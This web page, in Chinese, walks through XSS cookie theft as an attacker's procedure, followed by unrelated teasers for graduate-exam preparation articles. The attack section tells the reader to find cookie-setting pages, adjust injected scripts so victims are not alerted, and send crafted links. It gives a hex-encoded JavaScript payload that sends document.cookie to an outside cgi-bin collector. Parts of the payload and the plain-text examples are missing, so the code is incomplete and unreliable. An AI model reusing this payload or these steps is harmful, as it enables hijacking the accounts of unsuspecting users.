解释一下XSS cookie盗窃是什么意思
根据作为攻击对象的Web程序,下面某些变量和插入位置可能需要进行调整。要注意这只是攻击方法的一个例子。在这个例子中,我们将利用脚本“”中的 “viriable”变量中的跨站脚本漏洞,通过正常请求进行攻击。这是跨站脚本攻击最常见的形式。
第一步: 锁定目标
当你找到某个Web程序存在XSS漏洞之后,检查一下它是否设置了cookie。如果在该网站的任何地方设置了cookie,那么就可以从用户那里盗取它。
第二步: 测试
不同的攻击方式将产生不同的XSS漏洞,所以应适当进行测试以使得输出结果看起来像是正常的。某些恶意脚本插入之后会破坏输出的页面。(为欺骗用户,输出结果非常重要,因此攻击者有必要调整攻击代码使输出看起来正常。)
下一步你需要在链接至包含XSS漏洞的页面的`URL中插入 Javascript(或其他客户端脚本)。下面列出了一些经常用于测试XSS漏洞的链接。当用户点击这些链接时,用户的cookie奖被发送到 并被显示。如果你看到显示结果中包含了cookie信息,说明可能可以劫持该用户的账户。
盗取Cookie的Javascript示例。使用方法如下。
ASCII用法
http://host/
十六进制用法
http://host/
%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67
%69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f
%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63% 75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
注意: 每种用法都先写为ASCII,再写成十六进制以便复制粘贴。
-
2015考研复试需准备哪些内容
在考研成绩公布之前,建议广大考生做好复试的准备。以下是考研过来人的复试经验总结,希望对大家有所帮助。一、了解考研复试内容,最好充足准备主要说来,考研复试主要考听力和口语,然后就是专业课。下面我们分开来看下该如何准备这些内容。1.听力和口试听力和口语是考...
-
考研择校择专业常见问题解答
下面是小编搜集整理的一些考研择校择专业常见问题解答,有需要的朋友可以看看,希望对你有帮助。一、院校优先还是专业优先?(1)原则:院校为主兼顾专业:实力至上,如果你有充分的实力并做好多次考研的困难准备,就选择自己最中意的院校或专业,不需要考虑其他因素,相信自己,有...
-
2015考研政治毛中特知识点真题解析
2015考研政治在各位考生的期待中已经顺利考完,那么各位考生不管考的是否满意,都要去坚持,考研不仅考的是咱们的耐心,同时也是考的咱们的坚持,只有坚持到最后就是胜利。通过2015年考研政治试卷真题我们可以看出,历年考试中多次出现的试题仍然是复习的重点,也就是说知识...
-
2017年计算机考研专业就业前景及方向
计算机专业一直是全国各大高校的热门专业,发展迅猛,计算机专业考研也是相当的火热。IT业一直是国家优先发展的重点行业,也是国内外人才需求量最大的行业之一。伴随着互联网的发展,IT人才的短缺现象将会越来越严重。在我国,IC人才、网络存储人才、电子商务人才、信息...